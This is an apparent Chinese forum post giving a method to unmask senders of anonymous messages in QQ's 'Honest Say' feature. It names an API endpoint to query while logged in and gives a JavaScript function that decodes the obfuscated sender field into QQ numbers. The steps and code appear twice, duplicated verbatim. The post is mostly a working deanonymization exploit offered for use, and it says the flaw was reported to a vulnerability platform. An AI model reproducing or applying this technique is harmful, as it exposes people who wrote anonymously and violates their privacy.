目前已知的坦白说BUG
方法4,这个方法估计死的很快,因为据说发现的人已经提交了漏洞平台。
就是QQ空间先保持登录状态(就是先登录一次网页版QQ空间,然后不要关闭网页)
然后访问https://ti.qq.com/cgi-node/honest-say/receive/mine端口,可以获取到一堆json字符串
看到了上面的fromEncodeUin吗,这个是被加密了的QQ号字符串,然后使用下面这段代码来实锤他!!!
function decrypt(a){a=a.replace('*S1*','');var b=[{oe:'0',oK:'1',ow:'2',oi:'3','7e':'4','7K':'5','7w':'6','7i':'7',Ne:'8',NK:'9'},{4:'5',6:'1',n:'0','-':'2',o:'3',v:'4',C:'6',S:'7',c:'8',E:'9'},{5:'1',z:'0',A:'2',i:'3',P:'4',k:'5',s:'6',l:'7',F:'8',q:'9'}],c=[];return a.split('').forEach(function(e,f){if(1==f%4){var g=c.pop();c.push(g+e)}else c.push(e)}),c.map(function(e,f){return b[f%3][e]||'*'}).join('')};
decrypt('单引号里面输入要石锤的fromEncodeUin然后按回车即可')
看到没有,石锤@数学書
就是QQ空间先保持登录状态(就是先登录一次网页版QQ空间,然后不要关闭网页)
然后访问https://ti.qq.com/cgi-node/honest-say/receive/mine端口,可以获取到一堆json字符串
看到了上面的fromEncodeUin吗,这个是被加密了的QQ号字符串,然后使用下面这段代码来实锤他!!!
function decrypt(a){a=a.replace('*S1*','');var b=[{oe:'0',oK:'1',ow:'2',oi:'3','7e':'4','7K':'5','7w':'6','7i':'7',Ne:'8',NK:'9'},{4:'5',6:'1',n:'0','-':'2',o:'3',v:'4',C:'6',S:'7',c:'8',E:'9'},{5:'1',z:'0',A:'2',i:'3',P:'4',k:'5',s:'6',l:'7',F:'8',q:'9'}],c=[];return a.split('').forEach(function(e,f){if(1==f%4){var g=c.pop();c.push(g+e)}else c.push(e)}),c.map(function(e,f){return b[f%3][e]||'*'}).join('')};
decrypt('单引号里面输入要石锤的fromEncodeUin然后按回车即可')
看到没有,石锤@数学書
然后楼上那个代码其实我是从https://jackz.cn/article/qq_honestsay这里面扒下来的,这个加密算法其实就是循环查表替换,那个jackz也是原作者,特此声明版权规原作者所有。